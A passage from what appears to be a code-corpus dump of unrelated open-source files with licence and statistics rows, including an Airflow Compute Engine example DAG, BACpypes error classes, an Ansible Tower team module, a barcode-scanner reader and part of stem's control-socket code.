artoapply = request.form['alere_pima_beads_artoapply']
override = request.form['alere_pima_beads_override']
sample = request.form.get('alere_pima_beads_sample',
'requestid')
instrument = request.form.get('alere_pima_beads_instrument', None)
errors = []
logs = []
warns = []
# Load the most suitable parser according to file extension/options/etc...
parser = None
if not hasattr(infile, 'filename'):
errors.append(_("No file selected"))
if fileformat == 'slk':
parser = AlerePimaSLKParser(infile)
else:
errors.append(t(_("Unrecognized file format ${fileformat}",
mapping={"fileformat": fileformat})))
if parser:
# Load the importer
status = ['sample_received', 'attachment_due', 'to_be_verified']
if artoapply == 'received':
status = ['sample_received']
elif artoapply == 'received_tobeverified':
status = ['sample_received', 'attachment_due', 'to_be_verified']
over = [False, False]
if override == 'nooverride':
over = [False, False]
elif override == 'override':
over = [True, False]
elif override == 'overrideempty':
over = [True, True]
sam = ['getRequestID', 'getSampleID', 'getClientSampleID']
if sample == 'requestid':
sam = ['getRequestID']
if sample == 'sampleid':
sam = ['getSampleID']
elif sample == 'clientsid':
sam = ['getClientSampleID']
elif sample == 'sample_clientsid':
sam = ['getSampleID', 'getClientSampleID']
importer = AlerePimaImporter(parser=parser,
context=context,
idsearchcriteria=sam,
allowed_ar_states=status,
allowed_analysis_states=None,
override=over,
instrument_uid=instrument)
tbex = ''
try:
importer.process()
except:
tbex = traceback.format_exc()
errors = importer.errors
logs = importer.logs
warns = importer.warns
if tbex:
errors.append(tbex)
results = {'errors': errors, 'log': logs, 'warns': warns}
return json.dumps(results)
| agpl-3.0 | -3,365,620,268,281,323,000 | 34.365854 | 78 | 0.542414 | false |
philanthropy-u/edx-platform | cms/djangoapps/contentstore/views/export_git.py | 24 | 1723 | """
This views handles exporting the course xml to a git repository if
the giturl attribute is set.
"""
import logging
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.utils.translation import ugettext as _
from django.views.decorators.csrf import ensure_csrf_cookie
from opaque_keys.edx.keys import CourseKey
import contentstore.git_export_utils as git_export_utils
from edxmako.shortcuts import render_to_response
from student.auth import has_course_author_access
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
@ensure_csrf_cookie
@login_required
def export_git(request, course_key_string):
"""
This method serves up the 'Export to Git' page
"""
course_key = CourseKey.from_string(course_key_string)
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course_module = modulestore().get_course(course_key)
failed = False
log.debug('export_git course_module=%s', course_module)
msg = ""
if 'action' in request.GET and course_module.giturl:
if request.GET['action'] == 'push':
try:
git_export_utils.export_to_git(
course_module.id,
course_module.giturl,
request.user,
)
msg = _('Course successfully exported to git repository')
except git_export_utils.GitExportError as ex:
failed = True
msg = unicode(ex)
return render_to_response('export_git.html', {
'context_course': course_module,
'msg': msg,
'failed': failed,
})
| agpl-3.0 | 7,384,989,849,531,216,000 | 30.327273 | 73 | 0.660476 | false |
nathanielvarona/airflow | airflow/providers/google/cloud/example_dags/example_compute_igm.py | 10 | 5537 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example Airflow DAG that uses IGM-type compute operations:
* copy of Instance Template
* update template in Instance Group Manager
This DAG relies on the following OS environment variables
* GCP_PROJECT_ID - the Google Cloud project where the Compute Engine instance exists
* GCE_ZONE - the zone where the Compute Engine instance exists
Variables for copy template operator:
* GCE_TEMPLATE_NAME - name of the template to copy
* GCE_NEW_TEMPLATE_NAME - name of the new template
* GCE_NEW_DESCRIPTION - description added to the template
Variables for update template in Group Manager:
* GCE_INSTANCE_GROUP_MANAGER_NAME - name of the Instance Group Manager
* SOURCE_TEMPLATE_URL - url of the template to replace in the Instance Group Manager
* DESTINATION_TEMPLATE_URL - url of the new template to set in the Instance Group Manager
"""
import os
from airflow import models
from airflow.providers.google.cloud.operators.compute import (
ComputeEngineCopyInstanceTemplateOperator,
ComputeEngineInstanceGroupUpdateManagerTemplateOperator,
)
from airflow.utils.dates import days_ago
GCP_PROJECT_ID = os.environ.get('GCP_PROJECT_ID', 'example-project')
GCE_ZONE = os.environ.get('GCE_ZONE', 'europe-west1-b')
# [START howto_operator_compute_template_copy_args]
GCE_TEMPLATE_NAME = os.environ.get('GCE_TEMPLATE_NAME', 'instance-template-test')
GCE_NEW_TEMPLATE_NAME = os.environ.get('GCE_NEW_TEMPLATE_NAME', 'instance-template-test-new')
GCE_NEW_DESCRIPTION = os.environ.get('GCE_NEW_DESCRIPTION', 'Test new description')
GCE_INSTANCE_TEMPLATE_BODY_UPDATE = {
"name": GCE_NEW_TEMPLATE_NAME,
"description": GCE_NEW_DESCRIPTION,
"properties": {"machineType": "n1-standard-2"},
}
# [END howto_operator_compute_template_copy_args]
# [START howto_operator_compute_igm_update_template_args]
GCE_INSTANCE_GROUP_MANAGER_NAME = os.environ.get('GCE_INSTANCE_GROUP_MANAGER_NAME', 'instance-group-test')
SOURCE_TEMPLATE_URL = os.environ.get(
'SOURCE_TEMPLATE_URL',
"https://www.googleapis.com/compute/beta/projects/"
+ GCP_PROJECT_ID
+ "/global/instanceTemplates/instance-template-test",
)
DESTINATION_TEMPLATE_URL = os.environ.get(
'DESTINATION_TEMPLATE_URL',
"https://www.googleapis.com/compute/beta/projects/"
+ GCP_PROJECT_ID
+ "/global/instanceTemplates/"
+ GCE_NEW_TEMPLATE_NAME,
)
UPDATE_POLICY = {
"type": "OPPORTUNISTIC",
"minimalAction": "RESTART",
"maxSurge": {"fixed": 1},
"minReadySec": 1800,
}
# [END howto_operator_compute_igm_update_template_args]
with models.DAG(
'example_gcp_compute_igm',
schedule_interval=None, # Override to match your needs
start_date=days_ago(1),
tags=['example'],
) as dag:
# [START howto_operator_gce_igm_copy_template]
gce_instance_template_copy = ComputeEngineCopyInstanceTemplateOperator(
project_id=GCP_PROJECT_ID,
resource_id=GCE_TEMPLATE_NAME,
body_patch=GCE_INSTANCE_TEMPLATE_BODY_UPDATE,
task_id='gcp_compute_igm_copy_template_task',
)
# [END howto_operator_gce_igm_copy_template]
# Added to check for idempotence
# [START howto_operator_gce_igm_copy_template_no_project_id]
gce_instance_template_copy2 = ComputeEngineCopyInstanceTemplateOperator(
resource_id=GCE_TEMPLATE_NAME,
body_patch=GCE_INSTANCE_TEMPLATE_BODY_UPDATE,
task_id='gcp_compute_igm_copy_template_task_2',
)
# [END howto_operator_gce_igm_copy_template_no_project_id]
# [START howto_operator_gce_igm_update_template]
gce_instance_group_manager_update_template = ComputeEngineInstanceGroupUpdateManagerTemplateOperator(
project_id=GCP_PROJECT_ID,
resource_id=GCE_INSTANCE_GROUP_MANAGER_NAME,
zone=GCE_ZONE,
source_template=SOURCE_TEMPLATE_URL,
destination_template=DESTINATION_TEMPLATE_URL,
update_policy=UPDATE_POLICY,
task_id='gcp_compute_igm_group_manager_update_template',
)
# [END howto_operator_gce_igm_update_template]
# Added to check for idempotence (and without UPDATE_POLICY)
# [START howto_operator_gce_igm_update_template_no_project_id]
gce_instance_group_manager_update_template2 = ComputeEngineInstanceGroupUpdateManagerTemplateOperator(
resource_id=GCE_INSTANCE_GROUP_MANAGER_NAME,
zone=GCE_ZONE,
source_template=SOURCE_TEMPLATE_URL,
destination_template=DESTINATION_TEMPLATE_URL,
task_id='gcp_compute_igm_group_manager_update_template_2',
)
# [END howto_operator_gce_igm_update_template_no_project_id]
gce_instance_template_copy >> gce_instance_template_copy2 >> gce_instance_group_manager_update_template
gce_instance_group_manager_update_template >> gce_instance_group_manager_update_template2
| apache-2.0 | 5,540,849,412,725,495,000 | 39.416058 | 107 | 0.737222 | false |
JoelBender/bacpypes | py27/bacpypes/errors.py | 3 | 8195 | #!/usr/bin/python
#
# ConfigurationError
#
class ConfigurationError(ValueError):
"""This error is raised when there is a configuration problem such as
bindings between layers or required parameters that are missing.
"""
def __init__(self, *args):
self.args = args
#
# EncodingError
#
class EncodingError(ValueError):
"""This error is raised if there is a problem during encoding.
"""
def __init__(self, *args):
self.args = args
#
# DecodingError
#
class DecodingError(ValueError):
"""This error is raised if there is a problem during decoding.
"""
def __init__(self, *args):
self.args = args
#
# ExecutionError
#
class ExecutionError(RuntimeError):
"""This error is raised for if there is an error during the execution of
a service or function at the application layer of stack and the error
translated into an ErrorPDU.
"""
def __init__(self, errorClass, errorCode):
self.errorClass = errorClass
self.errorCode = errorCode
self.args = (errorClass, errorCode)
#
# Reject Exception Family
#
class RejectException(Exception):
"""Exceptions in this family correspond to reject reasons. If the
application raises one of these errors while processing a confirmed
service request, the stack will form an appropriate RejectPDU and
send it to the client.
"""
rejectReason = None
def __init__(self, *args):
if not self.rejectReason:
raise NotImplementedError("use a derived class")
# save the args
self.args = args
class RejectOther(RejectException):
"""Generated in response to a confirmed request APDU that contains a
syntax error for which an error code has not been explicitly defined.
"""
rejectReason = 'other'
class RejectBufferOverflow(RejectException):
"""A buffer capacity has been exceeded.
"""
rejectReason = 'bufferOverflow'
class InconsistentParameters(RejectException):
"""Generated in response to a confirmed request APDU that omits a
conditional service argument that should be present or contains a
conditional service argument that should not be present. This condition
could also elicit a Reject PDU with a Reject Reason of INVALID_TAG.
"""
rejectReason = 'inconsistentParameters'
class InvalidParameterDatatype(RejectException):
"""Generated in response to a confirmed request APDU in which the encoding
of one or more of the service parameters does not follow the correct type
specification. This condition could also elicit a Reject PDU with a Reject
Reason of INVALID_TAG.
"""
rejectReason = 'invalidParameterDatatype'
class InvalidTag(RejectException):
"""While parsing a message, an invalid tag was encountered. Since an
invalid tag could confuse the parsing logic, any of the following Reject
Reasons may also be generated in response to a confirmed request
containing an invalid tag: INCONSISTENT_PARAMETERS,
INVALID_PARAMETER_DATA_TYPE, MISSING_REQUIRED_PARAMETER, and
TOO_MANY_ARGUMENTS.
"""
rejectReason = 'invalidTag'
class MissingRequiredParameter(RejectException):
"""Generated in response to a confirmed request APDU that is missing at
least one mandatory service argument. This condition could also elicit a
Reject PDU with a Reject Reason of INVALID_TAG.
"""
rejectReason = 'missingRequiredParameter'
class ParameterOutOfRange(RejectException):
"""Generated in response to a confirmed request APDU that conveys a
parameter whose value is outside the range defined for this service.
"""
rejectReason = 'parameterOutOfRange'
class TooManyArguments(RejectException):
"""Generated in response to a confirmed request APDU in which the total
number of service arguments is greater than specified for the service.
This condition could also elicit a Reject PDU with a Reject Reason of
INVALID_TAG.
"""
rejectReason = 'tooManyArguments'
class UndefinedEnumeration(RejectException):
"""Generated in response to a confirmed request APDU in which one or
more of the service parameters is decoded as an enumeration that is not
defined by the type specification of this parameter.
"""
rejectReason = 'undefinedEnumeration'
class UnrecognizedService(RejectException):
"""Generated in response to a confirmed request APDU in which the Service
Choice field specifies an unknown or unsupported service.
"""
rejectReason = 'unrecognizedService'
#
# Abort Exception Family
#
class AbortException(Exception):
"""Exceptions in this family correspond to abort reasons. If the
application raises one of these errors while processing a confirmed
service request, the stack will form an appropriate AbortPDU and
send it to the client.
"""
abortReason = None
def __init__(self, *args):
if not self.abortReason:
raise NotImplementedError("use a derived class")
# save the args
self.args = args
class AbortOther(AbortException):
"""This abort reason is returned for a reason other than any of those
for which an error code has not been explicitly defined.
"""
abortReason = 'other'
class AbortBufferOverflow(AbortException):
"""A buffer capacity has been exceeded.
"""
abortReason = 'bufferOverflow'
class InvalidAPDUInThisState(AbortException):
"""Generated in response to an APDU that is not expected in the present
state of the Transaction State Machine.
"""
abortReason = 'invalidApduInThisState'
class PreemptedByHigherPriorityTask(AbortException):
"""The transaction shall be aborted to permit higher priority processing.
"""
abortReason = 'preemptedByHigherPriorityTask'
class SegmentationNotSupported(AbortException):
"""Generated in response to an APDU that has its segmentation bit set to
TRUE when the receiving device does not support segmentation. It is also
generated when a BACnet-ComplexACK-PDU is large enough to require
segmentation but it cannot be transmitted because either the transmitting
device or the receiving device does not support segmentation.
"""
abortReason = 'segmentationNotSupported'
class SecurityError(AbortException):
"""The Transaction is aborted due to receipt of a security error.
"""
abortReason = 'securityError'
class InsufficientSecurity(AbortException):
"""The transaction is aborted due to receipt of a PDU secured differently
than the original PDU of the transaction.
"""
abortReason = 'insufficientSecurity'
class WindowSizeOutOfRange(AbortException):
"""A device receives a request that is segmented, or receives any segment
of a segmented request, where the Proposed Window Size field of the PDU
header is either zero or greater than 127.
"""
abortReason = 'windowSizeOutOfRange'
class ApplicationExceededReplyTime(AbortException):
"""A device receives a confirmed request but its application layer has not
responded within the published APDU Timeout period.
"""
abortReason = 'applicationExceededReplyTime'
class OutOfResources(AbortException):
"""A device receives a request but cannot start processing because it has
run out of some internal resource.
"""
abortReason = 'outOfResources'
class TSMTimeout(AbortException):
"""A transaction state machine timer exceeded the timeout applicable for
the current state, causing the transaction machine to abort the
transaction.
"""
abortReason = 'tsmTimeout'
class APDUTooLong(AbortException):
"""An APDU was received from the local application program whose overall
size exceeds the maximum transmittable length or exceeds the maximum number
of segments accepted by the server.
"""
abortReason = 'apduTooLong'
class ServerTimeout(AbortException):
"""BACpypes specific.
"""
abortReason = 'serverTimeout'
class NoResponse(AbortException):
"""BACpypes specific.
"""
abortReason = 'noResponse'
| mit | 5,787,790,787,145,688,000 | 24.138037 | 79 | 0.719707 | false |
dcloud/marvelous | marvelous/tests/test_marvel_events.py | 1 | 1968 | from marvelous.tests.base import MarvelTests
from betamax import Betamax
class TestMarvelEvents(MarvelTests):
def test_event_by_id(self):
with Betamax(self.api._session).use_cassette('age_of_ultron_event'):
result = self.api.event(self.age_of_ultron_event)
self.assertIsInstance(result, dict)
def test_event_missing_id(self):
with self.assertRaises(TypeError):
self.api.event()
def test_events_characters(self):
with Betamax(self.api._session).use_cassette('events_characters'):
results = self.api.events_characters(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_comics(self):
with Betamax(self.api._session).use_cassette('events_comics'):
results = self.api.events_comics(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_creators(self):
with Betamax(self.api._session).use_cassette('events_creators'):
results = self.api.events_creators(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_series(self):
with Betamax(self.api._session).use_cassette('events_series'):
results = self.api.events_series(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_stories(self):
with Betamax(self.api._session).use_cassette('events_stories'):
results = self.api.events_stories(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
| bsd-2-clause | 6,991,969,294,185,304,000 | 43.727273 | 76 | 0.653963 | false |
sogelink/ansible | lib/ansible/modules/web_infrastructure/ansible_tower/tower_team.py | 34 | 3468 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2017, Wayne Witzel III <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: tower_team
author: "Wayne Witzel III (@wwitzel3)"
version_added: "2.3"
short_description: create, update, or destroy Ansible Tower team.
description:
- Create, update, or destroy Ansible Tower teams. See
U(https://www.ansible.com/tower) for an overview.
options:
name:
description:
- Name to use for the team.
required: True
default: null
organization:
description:
- Organization the team should be made a member of.
required: True
default: null
state:
description:
- Desired state of the resource.
required: False
default: "present"
choices: ["present", "absent"]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Create tower team
tower_team:
name: Team Name
description: Team Description
organization: test-org
state: present
tower_config_file: "~/tower_cli.cfg"
'''
from ansible.module_utils.ansible_tower import tower_argument_spec, tower_auth_config, tower_check_mode, HAS_TOWER_CLI
try:
import tower_cli
import tower_cli.utils.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
def main():
argument_spec = tower_argument_spec()
argument_spec.update(dict(
name=dict(required=True),
description=dict(),
organization=dict(required=True),
state=dict(choices=['present', 'absent'], default='present'),
))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
if not HAS_TOWER_CLI:
module.fail_json(msg='ansible-tower-cli required for this module')
name = module.params.get('name')
description = module.params.get('description')
organization = module.params.get('organization')
state = module.params.get('state')
json_output = {'team': name, 'state': state}
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
team = tower_cli.get_resource('team')
try:
org_res = tower_cli.get_resource('organization')
org = org_res.get(name=organization)
if state == 'present':
result = team.modify(name=name, organization=org['id'],
description=description, create_on_missing=True)
json_output['id'] = result['id']
elif state == 'absent':
result = team.delete(name=name, organization=org['id'])
except (exc.NotFound) as excinfo:
module.fail_json(msg='Failed to update team, organization not found: {0}'.format(excinfo), changed=False)
except (exc.ConnectionError, exc.BadRequest, exc.NotFound) as excinfo:
module.fail_json(msg='Failed to update team: {0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
from ansible.module_utils.basic import AnsibleModule
if __name__ == '__main__':
main()
| gpl-3.0 | -7,191,851,142,042,355,000 | 29.156522 | 118 | 0.637543 | false |
cfangmeier/Project_Scorpion | src/scorpion/hal/scanner.py | 1 | 1944 | '''
Created on Feb 15, 2014
@author: caleb
'''
import struct
import os
import re
import select
import threading
from queue import Queue
from scorpion.config import scanner_path, use_gui
import scorpion.ui.ui_main
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
scanner_data = Queue()
_mapping = {11: '0', 2 : '1', 3 : '2',
4 : '3', 5 : '4', 6 : '5',
7 : '6', 8 : '7', 9 : '8',
10: '9', 28: '\0'}
_scanner_file = None
_scanner_thread = None
kill_flag = False
def init_scanner():
global _scanner_file, _scanner_thread
if(not os.path.exists(scanner_path)):
print("ERROR: barcode scanner not found")
return
#disconnect scanner from x-input so scans
#aren't fed to wherever the cursor is
event_path = os.readlink(scanner_path)
event_id = re.findall('[0-9]+$',event_path)[-1]
os.system("xinput float " + event_id)
_scanner_file = open(scanner_path, "rb")
_scanner_thread = threading.Thread(target=_run)
_scanner_thread.start()
def _run():
global scanner_data
while True:
if kill_flag: return
(rlist,_,_) = select.select([_scanner_file],[],[],0.5)
if len(rlist) == 0: continue
reading = []
event = _scanner_file.read(EVENT_SIZE)
while event:
(_, _, type_, code, value) = struct.unpack(FORMAT, event)
if type_ == 1 and value == 1:
if _mapping[code] == '\0':
_scanner_file.read(EVENT_SIZE)
_scanner_file.read(EVENT_SIZE)
break
reading.append(_mapping[code])
event = _scanner_file.read(EVENT_SIZE)
scanner_data.put(''.join(reading))
if use_gui:
scorpion.ui.ui_main.set_upc(scanner_data.get())
def stop_scanner():
global kill_flag, _scanner_thread
kill_flag = True
if _scanner_thread != None:
_scanner_thread.join()
| gpl-2.0 | 4,108,641,824,097,425,000 | 27.188406 | 69 | 0.572531 | false |
r0jsik/rinde | test/stage/__init__.py | 1 | 6341 | from rinde.stage import ControllerBase
from rinde.stage.node.switch import RadioSwitch
from rinde.stage.node.pane import Pane
from rinde.stage.node.text import Text
from rinde.stage.node.util import Canvas
from rinde.stage.node.util import Image
class Controller(ControllerBase):
def __lookup_element(self, node_id, selector):
return self.nodes[node_id].lookup_element(selector)
def start(self):
self.__test_boundary()
self.__test_password_field()
self.__test_text_field()
self.__test_check_switch()
self.__test_radio_switch()
self.__test_pane()
self.__test_slider()
self.__test_canvas_view()
self.__test_image_view()
self.__test_pages()
self.__test_choice_box()
self.__test_list_view()
self.__test_text_area()
self.__test_text_flow()
def __test_boundary(self):
boundary_1 = self.nodes["Boundary-1"]
boundary_2 = self.nodes["Boundary-2"]
assert boundary_1.absolute_position() == (17, 9)
assert boundary_1.absolute_size() == (49, 54)
assert boundary_2.absolute_position() == (41, 31)
assert boundary_2.absolute_size() == (4, 4)
boundary_1["padding"] = 1, 2, 3, 4
assert boundary_1.absolute_position() == (17, 9)
assert boundary_1.absolute_size() == (43, 42)
boundary_2["margin"] = 4, 3, 2, 1
assert boundary_2.absolute_position() == (23, 20)
assert boundary_2.absolute_size() == (4, 4)
def __test_password_field(self):
assert self.nodes["PasswordField-1"]["text"] == ""
assert self.nodes["PasswordField-1"]["content-text"] == ""
self.nodes["PasswordField-1"]["text"] = "correct"
assert self.nodes["PasswordField-1"]["text"] == "correct"
assert self.nodes["PasswordField-1"]["content-text"] == "*******"
def __test_text_field(self):
assert self.nodes["TextField-1"]["text"] == ""
assert self.nodes["TextField-1"]["content-text"] == ""
self.nodes["TextField-1"]["text"] = "correct"
assert self.nodes["TextField-1"]["text"] == "correct"
assert self.nodes["TextField-1"]["content-text"] == "correct"
def __test_check_switch(self):
assert self.nodes["CheckSwitch"]["selected"] is False
self.nodes["CheckSwitch"].click()
assert self.nodes["CheckSwitch"]["selected"] is True
def __test_radio_switch(self):
radio_switch_1 = self.nodes["RadioSwitch-1"]
radio_switch_2 = self.nodes["RadioSwitch-2"]
assert radio_switch_1["selected"] is True
assert radio_switch_2["selected"] is False
radio_switch_2.click()
assert radio_switch_1["selected"] is False
assert radio_switch_2["selected"] is True
radio_switch_3 = RadioSwitch(self.groups["RadioSwitch"], "3", selected=True)
assert radio_switch_1["selected"] is False
assert radio_switch_2["selected"] is False
assert radio_switch_3["selected"] is True
def __test_pane(self):
pane = self.nodes["Pane"]
text = Text()
subpane = Pane()
pane.insert_node(subpane)
assert text["font-size"] == 0
assert subpane in pane.children()
subpane.insert_node(text)
assert text["font-size"] != 0
assert text in subpane.children()
pane.remove_node(subpane)
assert subpane not in pane.children()
def __test_slider(self):
slider = self.nodes["Slider-1"]
slider["value"] = 200
assert slider["value"] == 100
slider["value"] = -10
assert slider["value"] == 0
slider["value"] = 200
assert slider["value"] == 100
self.nodes["Slider-3"]["value"] = 200
self.nodes["Slider-3"]["range"] = 150
def __test_canvas_view(self):
canvas_view = self.nodes["CanvasView"]
assert canvas_view.absolute_size() == (256, 256)
canvas = Canvas(128, 64)
canvas_view.set_canvas(canvas)
canvas.fill(0, 255, 255)
assert canvas_view.absolute_size() == (128, 64)
def __test_image_view(self):
image_view = self.nodes["ImageView"]
image = Image("res/test_2.png")
assert image_view.absolute_size() == (128, 128)
image_view.set_image(image)
assert image_view.absolute_size() == (256, 256)
def __test_pages(self):
self.groups["module"].select("button")
self.__assert_only_visible_page("button")
self.groups["module"].select("input")
self.__assert_only_visible_page("input")
self.groups["module"].select(None)
def __assert_only_visible_page(self, name):
for node in self.nodes["Pages"].children():
assert node["visible"] == False or node == name
assert self.groups["module"] == name
def __test_choice_box(self):
disposer = self.__lookup_element("ChoiceBox", "disposer")
self.nodes["ChoiceBox"]["placeholder"] = "Select option..."
assert disposer.placeholded_text["text"] == "Option 2"
self.nodes["ChoiceBox"].remove_option("option_2")
assert disposer.placeholded_text["text"] == ""
self.groups["ChoiceBox"].add_trigger(self.__page_selected)
self.groups["ChoiceBox"].select("button")
def __page_selected(self):
module = self.groups["ChoiceBox"].get_selected_name()
self.groups["module"].select(module)
def __test_list_view(self):
self.nodes["ListView"].insert_option("Option 0", "option_0", index=0)
assert self.groups["ListView"] == "option_3"
self.nodes["ListView"].remove_option("option_3")
assert self.groups["ListView"].get_selected_name() is None
self.nodes["ListView"].insert_option("Option 4", "option_4", True, 3)
assert self.groups["ListView"] == "option_4"
def __test_text_area(self):
self.nodes["TextArea"]["text"] = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec tempor dapibus condimentum. Donec a malesuada ex, quis posuere nisl. Curabitur a molestie est, a aliquet enim. Integer sit amet nulla in mauris rhoncus tempor id ut tortor."
def __test_text_flow(self):
self.nodes["TextFlow"]["text"] = "Lorem ipsum dolor sit amet, consectetur adipiscing elit.\nDonec tempor dapibus condimentum.\nDonec a malesuada ex, quis posuere nisl.\nCurabitur a molestie est, a aliquet enim.\nInteger sit amet nulla in mauris rhoncus tempor id ut tortor.\nUt eu enim id tortor iaculis volutpat.\nMaecenas metus nulla, tristique a leo a, sollicitudin mollis leo.\nMorbi lorem erat, euismod et mauris sed, congue eleifend arcu."
def action_1(self):
self.nodes["TextField-2"]["text"] = "Very long text typed in the TextField"
def action_2(self):
self.nodes["RadioSwitch-1"]["text"] = "Very long description of the RadioSwitch"
| mit | 2,515,500,735,109,604,400 | 29.63285 | 447 | 0.671818 | false |
mmulazzani/HoneyConnector | client/stem/socket.py | 2 | 19481 | # Copyright 2011-2013, Damian Johnson
# Copyright 2012, Sean Robinson
# See LICENSE for licensing information
"""
Supports message based communication with sockets speaking the tor control
protocol. This lets users send messages as basic strings and receive responses
as instances of the :class:`~stem.response.ControlMessage` class.
**Module Overview:**
::
ControlSocket - Socket wrapper that speaks the tor control protocol.
|- ControlPort - Control connection via a port.
| |- get_address - provides the ip address of our socket
| +- get_port - provides the port of our socket
|
|- ControlSocketFile - Control connection via a local file socket.
| +- get_socket_path - provides the path of the socket we connect to
|
|- send - sends a message to the socket
|- recv - receives a ControlMessage from the socket
|- is_alive - reports if the socket is known to be closed
|- is_localhost - returns if the socket is for the local system or not
|- connect - connects a new socket
|- close - shuts down the socket
+- __enter__ / __exit__ - manages socket connection
send_message - Writes a message to a control socket.
recv_message - Reads a ControlMessage from a control socket.
send_formatting - Performs the formatting expected from sent messages.
"""
from __future__ import absolute_import
import re
import socket
import threading
import stem.prereq
import stem.response
import stem.util.str_tools
from stem.util import log
class ControlSocket(object):
"""
Wrapper for a socket connection that speaks the Tor control protocol. To the
better part this transparently handles the formatting for sending and
receiving complete messages. All methods are thread safe.
Callers should not instantiate this class directly, but rather use subclasses
which are expected to implement the **_make_socket()** method.
"""
def __init__(self):
self._socket, self._socket_file = None, None
self._is_alive = False
# Tracks sending and receiving separately. This should be safe, and doing
# so prevents deadlock where we block writes because we're waiting to read
# a message that isn't coming.
self._send_lock = threading.RLock()
self._recv_lock = threading.RLock()
def send(self, message, raw = False):
"""
Formats and sends a message to the control socket. For more information see
the :func:`~stem.socket.send_message` function.
:param str message: message to be formatted and sent to the socket
:param bool raw: leaves the message formatting untouched, passing it to the socket as-is
:raises:
* :class:`stem.SocketError` if a problem arises in using the socket
* :class:`stem.SocketClosed` if the socket is known to be shut down
"""
with self._send_lock:
try:
if not self.is_alive():
raise stem.SocketClosed()
send_message(self._socket_file, message, raw)
except stem.SocketClosed, exc:
# if send_message raises a SocketClosed then we should properly shut
# everything down
if self.is_alive():
self.close()
raise exc
def recv(self):
"""
Receives a message from the control socket, blocking until we've received
one. For more information see the :func:`~stem.socket.recv_message` function.
:returns: :class:`~stem.response.ControlMessage` for the message received
:raises:
* :class:`stem.ProtocolError` the content from the socket is malformed
* :class:`stem.SocketClosed` if the socket closes before we receive a complete message
"""
with self._recv_lock:
try:
# makes a temporary reference to the _socket_file because connect()
# and close() may set or unset it
socket_file = self._socket_file
if not socket_file:
raise stem.SocketClosed()
return recv_message(socket_file)
except stem.SocketClosed, exc:
# If recv_message raises a SocketClosed then we should properly shut
# everything down. However, there's a couple cases where this will
# cause deadlock...
#
# * this socketClosed was *caused by* a close() call, which is joining
# on our thread
#
# * a send() call that's currently in flight is about to call close(),
# also attempting to join on us
#
# To resolve this we make a non-blocking call to acquire the send lock.
# If we get it then great, we can close safely. If not then one of the
# above are in progress and we leave the close to them.
if self.is_alive():
if self._send_lock.acquire(False):
self.close()
self._send_lock.release()
raise exc
def is_alive(self):
"""
Checks if the socket is known to be closed. We won't be aware if it is
until we either use it or have explicitily shut it down.
In practice a socket derived from a port knows about its disconnection
after a failed :func:`~stem.socket.ControlSocket.recv` call. Socket file
derived connections know after either a
:func:`~stem.socket.ControlSocket.send` or
:func:`~stem.socket.ControlSocket.recv`.
This means that to have reliable detection for when we're disconnected
you need to continually pull from the socket (which is part of what the
:class:`~stem.control.BaseController` does).
:returns: **bool** that's **True** if our socket is connected and **False** otherwise
"""
return self._is_alive
def is_localhost(self):
"""
Returns if the connection is for the local system or not.
:returns: **bool** that's **True** if the connection is for the local host and **False** otherwise
"""
return False
def connect(self):
"""
Connects to a new socket, closing our previous one if we're already
attached.
:raises: :class:`stem.SocketError` if unable to make a socket
"""
with self._send_lock:
# Closes the socket if we're currently attached to one. Once we're no
# longer alive it'll be safe to acquire the recv lock because recv()
# calls no longer block (raising SocketClosed instead).
if self.is_alive():
self.close()
with self._recv_lock:
self._socket = self._make_socket()
self._socket_file = self._socket.makefile(mode = "rwb")
self._is_alive = True
# It's possible for this to have a transient failure...
# SocketError: [Errno 4] Interrupted system call
#
# It's safe to retry, so give it another try if it fails.
try:
self._connect()
except stem.SocketError:
self._connect() # single retry
def close(self):
"""
Shuts down the socket. If it's already closed then this is a no-op.
"""
with self._send_lock:
# Function is idempotent with one exception: we notify _close() if this
# is causing our is_alive() state to change.
is_change = self.is_alive()
if self._socket:
# if we haven't yet established a connection then this raises an error
# socket.error: [Errno 107] Transport endpoint is not connected
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
# Suppressing unexpected exceptions from close. For instance, if the
# socket's file has already been closed then with python 2.7 that raises
# with...
# error: [Errno 32] Broken pipe
try:
self._socket.close()
except:
pass
if self._socket_file:
try:
self._socket_file.close()
except:
pass
self._socket = None
self._socket_file = None
self._is_alive = False
if is_change:
self._close()
def _get_send_lock(self):
"""
The send lock is useful to classes that interact with us at a deep level
because it's used to lock :func:`stem.socket.ControlSocket.connect` /
